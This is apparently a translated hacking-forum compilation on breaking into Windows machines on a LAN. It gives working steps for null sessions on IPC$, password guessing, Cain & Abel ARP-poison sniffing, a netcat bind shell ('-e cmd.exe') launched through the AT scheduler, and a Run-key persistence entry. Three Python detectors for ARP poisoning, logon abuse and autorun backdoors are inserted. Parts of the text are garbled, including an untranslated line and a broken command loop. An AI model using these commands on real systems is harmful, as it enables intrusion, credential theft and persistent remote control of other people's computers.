[Hacking] HACKING COMPUTERS ON A LAN (HVA)

Part 1:
Hacking a computer on a LAN. There is nothing new about this intrusion method, but many people who use computers on a LAN still fall victim to it.
I wrote this article to show you that a hacker can use anything to break into a computer, even the things we think of as the simplest.
Target
Computer name: victim
IP address: 192.168.1.3
Operating system: Windows Server 2003
Step 1: First, connect to ipc$ using the following command:
Code:
C:\>net use \\victim\ipc$ /u:administrator
Step 2: Open the registry editor and connect it to the registry of the victim computer as follows:
Code:
Start --> Run, type regedit [enter]
In Registry Editor, choose Connect Network Registry.
Enter the name of the computer whose registry you want to work with remotely. Here that is victim.
Step 3:
After successfully connecting to the victim's registry, go to
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\TelnetServer
Change the value NTLM = 0 to disable NTLM.
Step 4:
Use MMC to start the Telnet service on the victim machine.
Step 5: Connect to the victim machine
Code:
C:\>telnet victim
Once you have logged in to the victim machine and have a shell, I probably don't need to say what comes next.

Enabling the Telnet service is only one of the ways a hacker can gain access to the victim machine.
In other cases they might enable Remote Desktop, etc.
This shows that you should disable unnecessary services, and should not leave the Administrator password blank or set it to something too simple, etc.
A single small oversight is enough for your computer to be compromised.
For more detail you can download the HACK LAN demo video.
Part 2:

In this second article I want to present the password sniffing technique using Cain & Abel.
Cain & Abel is one of the top-ranked security tools. You can download the latest version at http://oxid.netsons.org/download/ca_setup.exe
At the moment I am using Cain & Abel v4.9.3.
Cain & Abel v4.9.3 released
New features:
- Added Windows Mail (Vista) Password Decoder for POP3, IMAP, NNTP, SMTP and LDAP accounts.
- Added PTW WEP cracking attack.
- Added Windows Vista support in Wireless Password Decoder.
- Wireless Password Decoder now uses DLL injection under XP.
Cain's features speak for themselves, there are a great many of them; here I only introduce password sniffing.
You can read about its other features in the documentation that comes with the program.
Step 1: After installing and starting Cain, configure the network adapter correctly.
On Cain's menu choose Configure --> select the appropriate Network Adapter.
Click Start Sniffer.
Step 2: Select the Sniffer tab --> Scan MAC Addresses. This produces the list of IP addresses the program was able to scan.
Step 3: In the tabs at the bottom of the Sniffer tab, select APR. In the APR pane you can add the IP addresses to sniff. Select the destination IP and the source IP.
Step 4: Click Start APR, then sit and wait for passwords to "fall into the net".
You can watch the following video clip for more detail.
In the video clip I sniff passwords sent from the machine with IP 192.168.1.7.
My machine's IP address is 192.168.1.6; it runs Cain and waits to grab any password that machine 192.168.1.7 submits :)
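APR (ARP poison routing) leaves a visible trace in the victim's ARP cache. The following is an added example, not part of the original article: it parses `arp -a` output and reports MAC addresses claimed by more than one IP, plus bindings that differ from a known-good baseline. The sample output, the gateway address 192.168.1.1, all MAC addresses and the baseline are constructed for illustration.

```python
import re
from collections import defaultdict

# Constructed `arp -a` output as it might look on 192.168.1.7 while poisoned:
# the gateway entry (assumed to be 192.168.1.1) carries the MAC of 192.168.1.6.
SAMPLE_ARP = """\
Interface: 192.168.1.7 --- 0x2
  Internet Address      Physical Address      Type
  192.168.1.1           00-11-22-33-44-55     dynamic
  192.168.1.3           00-AA-BB-CC-DD-03     dynamic
  192.168.1.6           00-11-22-33-44-55     dynamic
  192.168.1.255         ff-ff-ff-ff-ff-ff     static
"""
# Constructed baseline recorded while the network was known to be clean.
BASELINE = {"192.168.1.1": "00-de-ad-00-00-01", "192.168.1.3": "00-aa-bb-cc-dd-03"}

ENTRY = re.compile(
    r"^\s*(\d{1,3}(?:\.\d{1,3}){3})\s+([0-9A-Fa-f]{2}(?:-[0-9A-Fa-f]{2}){5})\s", re.M)

def parse_arp_table(text):
    """Return {ip: mac} for unicast entries; broadcast/multicast MACs are skipped."""
    table = {}
    for ip, mac in ENTRY.findall(text):
        if int(mac[:2], 16) & 1:      # group bit set: broadcast or multicast
            continue
        table[ip] = mac.lower()
    return table

def shared_macs(table):
    """MACs claimed by more than one IP, a common sign of ARP poisoning."""
    by_mac = defaultdict(list)
    for ip, mac in table.items():
        by_mac[mac].append(ip)
    key = lambda ip: tuple(map(int, ip.split(".")))
    return {m: sorted(ips, key=key) for m, ips in by_mac.items() if len(ips) > 1}

def changed_bindings(baseline, table):
    """IPs whose MAC differs from the recorded baseline: {ip: (old, new)}."""
    return {ip: (old, table[ip]) for ip, old in baseline.items()
            if ip in table and table[ip] != old}

if __name__ == "__main__":
    current = parse_arp_table(SAMPLE_ARP)
    print("shared MACs:", shared_macs(current))
    print("changed since baseline:", changed_bindings(BASELINE, current))
```

A shared MAC can also be legitimate (one host with several addresses), so the baseline comparison for the gateway is the stronger signal.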
Part 3:
This article is written for the purpose of sharing, learning and exchanging knowledge! Its subject is hacking into PCs running the Windows operating system and the methods of defending against it (within the limits of my own knowledge).
Let us start by thinking about the directions to take. When you are online (that is, connected to the Internet) your ISP assigns you some IP address. Can a hacker find out your IP? The answer is yes (if the hacker communicates with you, your machine and the hacker's machine have a connection, which means packets are exchanged, and the source IP address can be read from those packets).
Once your IP is known, can the hacker break into your computer? The answer is that it is entirely possible.
So how does the hacker go about it?
Hacking through shared resources:
A hacker can use automated hacking tools such as ent3 or legion (but in essence these tools just carry out, automatically, the steps I describe below, so using them is a rather lame approach).
First the hacker checks which resources are shared on your computer.
It takes only a few simple commands on the command line:
CODE
C:\> net view \\x.x.x.x      (where x.x.x.x is your IP address, known to the hacker)
Shared resources at \\x.x.x.x

Share name   Type   Used as   Comment
------------------------------------------------------------------------------
C            Disk
PRJA3        Disk
The command completed successfully.
C:\>
With Windows 95 and 98 the likelihood of being hacked is much higher than with Windows NT, 2000 or XP (because Windows 95 and 98 use the FAT and FAT32 formats, which are far less secure than NTFS).
On these two versions of Windows (95, 98) the hacker does not even need to obtain Administrator to be able to do everything (can you believe it?).
Recommendation: do not use these two versions of Windows; they are badly outdated and can be hacked at any time.
After listing the shared drives and folders, the hacker's next step is to access them to get the data (which is the hacker's goal). The hacker maps the shared drive or folder in order to access it.
Again from the command line:
CODE
C:\> net use z: \\x.x.x.x\share
The command completed successfully.

Is hacking really that simple? No, it is not that simple at all, because the victim's machine has a password set (mapping the share requires knowing a username and password). So does the hacker give up? No, a hacker never gives up; the hacker will try to obtain the username and password.
Getting the username:
CODE
C:\> nbtstat -A x.x.x.x
NetBIOS Remote Machine Name Table
Name               Type         Status
--------------------------------------------
ADMIN          <00>  UNIQUE      Registered
BODY           <00>  GROUP       Registered
ADMIN          <20>  UNIQUE      Registered
BODY           <1e>  GROUP       Registered
BODY           <1d>  UNIQUE      Registered
..__MSBROWSE__.<01>  GROUP       Registered
MAC Address = 00-08-A1-5B-E3-8C
So machine x.x.x.x has 2 usernames: ADMIN and BODY.
Once the hacker has the usernames, the hacker proceeds to crack the password (using tools such as pqwak or xIntruder).
Alternatively the hacker builds a dictionary (based on the hacker's own guesswork) named pass.txt:
CODE
ADMIN
123456 ADMIN
123456 BODY
BODY

The hacker then cracks the password with the command:

You can also create Userlist.txt and passlist.txt and then use the command:

CODE
C:\> FOR /F %i IN (1,1,254) DO nat u userlist.txt p passlist.txt x.x.x.x.%I>>output.txt
On Windows 2000 and XP a hacker is nothing without administrator rights, so the hacker will try to obtain administrator at any cost.
Once admin has been obtained, everything else is up to the hacker.
Recommendation: do not share anything at all (if you really have to share, set a reasonably complex password).
Suppose the victim's machine has no shares. What does the hacker do then?
In this case the hacker guesses the user and password (using the method above or tools such as user2sid/sid2user, dumpACL, SMBGrind) and then connects to IPC$ (a default Windows share):
CODE
C:\> net use \\x.x.x.x\IPC$ password /user:administrator
The command completed successfully.
If the user and password cannot be guessed, the hacker can establish a null session to the victim machine:
CODE
C:\> net use \\x.x.x.x\IPC$ /user:
The command completed successfully
And then, if the victim has set permissions incorrectly, the consequences can be severe.
Recommendation: disable NetBIOS (click My Network Places, choose Local Area Connection, select TCP/IP, click Properties, choose Advanced, choose WINS and click Disable NetBIOS over TCP/IP), use a firewall to block ports that are not needed, and lock accounts after a number of failed logon attempts.
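Both behaviours described above, repeated password guesses and null sessions to IPC$, can be spotted in logon and share-access events. The following is an added example, not part of the original article: it flags sources that exceed a failed-logon threshold within a time window and sources that reach IPC$ as ANONYMOUS LOGON. The records are constructed and simplified (field names are assumptions); 4625 and 5140 are the event IDs used by current Windows versions, and ADMIN, BODY and PRJA3 are reused from the sample output above.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed, simplified Security-log records; field names are assumptions.
# 4625 = failed logon, 5140 = network share accessed.
EVENTS = [
    {"time": f"2024-01-15 09:00:{s:02d}", "id": 4625, "user": u, "src": "192.168.1.6"}
    for s, u in enumerate(["ADMIN", "BODY"] * 3)
] + [
    {"time": "2024-01-15 09:03:10", "id": 4625, "user": "alice", "src": "192.168.1.20"},
    {"time": "2024-01-15 09:05:00", "id": 5140, "user": "ANONYMOUS LOGON",
     "src": "192.168.1.6", "share": r"\\*\IPC$"},
    {"time": "2024-01-15 09:06:00", "id": 5140, "user": "alice",
     "src": "192.168.1.20", "share": r"\\*\PRJA3"},
]

def _when(event):
    return datetime.strptime(event["time"], "%Y-%m-%d %H:%M:%S")

def guessing_sources(events, threshold=5, window=timedelta(seconds=60)):
    """Sources with >= threshold failed logons inside one window: {src: [users tried]}."""
    by_src = defaultdict(list)
    for e in events:
        if e["id"] == 4625:
            by_src[e["src"]].append((_when(e), e["user"]))
    flagged = {}
    for src, fails in by_src.items():
        fails.sort()
        start = 0
        for end in range(len(fails)):
            while fails[end][0] - fails[start][0] > window:
                start += 1                      # slide the window forward
            if end - start + 1 >= threshold:
                flagged[src] = sorted({u for _, u in fails[start:end + 1]})
                break
    return flagged

def null_session_sources(events):
    """Sources that reached IPC$ as ANONYMOUS LOGON (a null session)."""
    return sorted({e["src"] for e in events
                   if e["id"] == 5140 and e["user"].upper() == "ANONYMOUS LOGON"
                   and e["share"].upper().endswith("\\IPC$")})

if __name__ == "__main__":
    print("password guessing:", guessing_sources(EVENTS))
    print("null sessions:", null_session_sources(EVENTS))
```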
While we are at it, a few words about remote control (since many people manage to break in and then do not know what to do next).
Suppose you already have the admin username and password of the victim machine.
Now establish a session:

CODE
C:\> net use \\x.x.x.x\IPC$ password /user:administrator
The command completed successfully.
Next we need to copy a backdoor over to control the victim machine. There are many kinds of backdoor, but the one I find best is still netcat (nc).
Copy nc to the victim machine:

CODE
C:\>copy nc.exe \\x.x.x.x\ADMIN$\nc.exe
The command completed successfully.
1 file copies

Start the Schedule service on the victim machine (this service is needed in order to execute files on the victim machine; by default it is running after Windows is installed):

CODE
C:\> sc \\x.x.x.x start schedule
service_name : schedule
Now check the time on the victim machine:

CODE
C:\> net time \\x.x.x.x
Current time at \\10.0.0.31 is 6/29/2005 4:50 AM
The command completed successfully.
Now run netcat in listening mode on port 111:

CODE
C:\>AT \\x.x.x.x 4:55 /interactive c:\windows\nc.exe -L -d -p111 -e cmd.exe
Added a new job with job ID = 1
Wait until 4:55 and then try nc.exe:

CODE
C:\>nc -nvv x.x.x.x 111
(UNKNOWN) [x.x.x.x] 111 (?) open
Microsoft Windows XP [Version 5.1.2600]
Copyright 1985-2001 Microsoft Corp.
C:\windows>
What you do now is up to you (but don't go vandalising other people's machines).
The question is how to make netcat start automatically and listen for our commands the next time the victim turns the computer on.
You can have netcat start together with Windows. Create a new file netcat.reg (use Notepad and save it as .reg) with the following content:

CODE
Windows Registry Editor Version 5.00
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"netcat"="\"C:\\nc\\nc.exe\" -L -d -p111 -e cmd.exe"
Then copy it to the victim machine and run it!
I hope nobody uses this for vandalism! Regards
Author: ZENO-HVAOnline
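The Run-key entry above is also what an incident responder looks for. The following is an added example, not part of the original article: it parses an exported .reg file and flags autorun values whose command line hands a command shell to another program or starts a listener. The sample export is constructed; its "netcat" value mirrors the entry shown above, and the "ctfmon" and "note" values are constructed for contrast.

```python
import re

# Constructed .reg export. "netcat" mirrors the entry shown in the article;
# "ctfmon" and the Explorer key are constructed values for contrast.
SAMPLE_REG = r'''Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"ctfmon"="C:\\WINDOWS\\system32\\ctfmon.exe"
"netcat"="\"C:\\nc\\nc.exe\" -L -d -p111 -e cmd.exe"

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer]
"note"="nc.exe -e cmd.exe"
'''

AUTORUN_KEY = re.compile(r"\\CurrentVersion\\Run(Once)?$", re.I)
VALUE = re.compile(r'^"((?:[^"\\]|\\.)*)"="((?:[^"\\]|\\.)*)"$')
SHELL_HANDOFF = re.compile(r"(?:^|\s)-e\s+\S*cmd(?:\.exe)?\b", re.I)
LISTENER = re.compile(r"(?:^|\s)-l\b", re.I)

def unescape(reg_string):
    """Undo .reg string escaping (\\\\ -> \\ and \\" -> ")."""
    return re.sub(r"\\(.)", r"\1", reg_string)

def audit_run_keys(reg_text):
    """Return suspicious Run/RunOnce values found in a .reg export."""
    findings, key = [], None
    for line in reg_text.splitlines():
        line = line.strip()
        if line.startswith("[") and line.endswith("]"):
            key = line[1:-1]                   # current registry key
            continue
        match = VALUE.match(line)
        if not match or key is None or not AUTORUN_KEY.search(key):
            continue                           # only string values under autorun keys
        name, command = unescape(match.group(1)), unescape(match.group(2))
        reasons = []
        if SHELL_HANDOFF.search(command):
            reasons.append("passes a command shell to the program (-e cmd.exe)")
        if LISTENER.search(command):
            reasons.append("starts in listen mode (-L)")
        if reasons:
            findings.append({"key": key, "name": name,
                             "command": command, "reasons": reasons})
    return findings

if __name__ == "__main__":
    for finding in audit_run_keys(SAMPLE_REG):
        print(finding)
```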
Part 4: Basic methods of intrusion on a LAN

Link: http://www.kmasecurity.net/xforce/thao-luan-chung-ve-hacking/1573-phuong-phap-co-ban-dedot-nhap-trong-lan.html
(collected)
1- Check the IPC share: IPC stands for Inter-Process Communication and is used for sharing data between applications and computers on the network (NT/2K). When a machine boots and logs on to the network, the operating system creates a default share named IPC$. It lets other machines see and connect to the shares on this machine. However, for some reason the user may have deleted the IPC$ share, so we need to check and re-create the connection to IPC$ (called a null connection). If the connection succeeds, we can also see the special hidden shares (including C$, ADMIN$, IPC$). Specifically, use one of the following 3 commands at the command prompt:



C:\>NET USE \\TARGET\IPC$ "" /USER:""
C:\>NET USE \\TARGET\IPC$ * /USER:
C:\>NET USE \\TARGET\IPC$ * /USER:""

where target is the computer name or IP of the machine you want to connect to.

Note that a $ sign after the share name indicates that the share is hidden, and that this method only works when NetBIOS port 139 is open on both your machine and the target machine.
With shares of this kind you will usually have little chance of exploiting anything. However, if you are lucky, you may still be able to exploit them when those shares do not require a password.

Next, use the following command to view the visible shares:


C:\>net view \\TARGET
The net view command lists the shares of the target machine. Use net view /? to learn its other uses.
After creating the null connection you know the shares on the other machine. For shares protected by a username/password, you can use the following tools to try to crack them: Nat (NetBIOS Auditing Tool)...
To save time, you can find and try the xSharez scanner program, which can give you similar results.

2- Check open ports

Another way to connect to a machine is to go through the open ports of the target machine. Depending on the type of port there are different ways to exploit it; the simplest is to use telnet to connect to the machine through an open port, for example:

C:\>telnet Vietnam.info
Mt s port thng dng:
21: FTP
23: Telnet proxy server
25: SMTP
110: POP3
139: NETBIOS
1080: SOCKS proxy
6667: IRC mapping
.....
There are a great many port scanning tools, for example superscan, elite, .... You can go to the tools section of Learning hacking For Viet to download them.
After scanning and finding which ports are open, if a port is not one of those above, try connecting to it with telnet; if that succeeds, you may get into that machine's command prompt shell.

3- Check for OS/software vulnerabilities

The last method I mention here, and also the hardest, is to find out which OS, which server and which software the machine is running. Each of these has its own holes/vulnerabilities, which are found and described in detail on security sites such as ntbugtraq and securityfocus, or in forums.
From the known vulnerabilities, we use the corresponding exploits to penetrate the machine.
The most elementary flaw in system software concerns how passwords are set. For example, Windows 9x machines can be entered without a password (of course the person logging in will then have restricted access to network resources); or, with NT/2K, the default administrator password after setup is blank, and if the user does not change the admin password we can connect remotely under the username administrator without a password.
The remaining flaws are usually caused by mistakes made while writing the program that unintentionally create holes: code whose checks are incomplete, not stable... allowing users to execute commands and run programs remotely. An example is the Unicode encoding bug in IIS4... And the common way to get in is to find a way to send a trojan/backdoor (typically Netcat...) to that machine, run that backdoor to open some particular port, and then connect remotely to that port.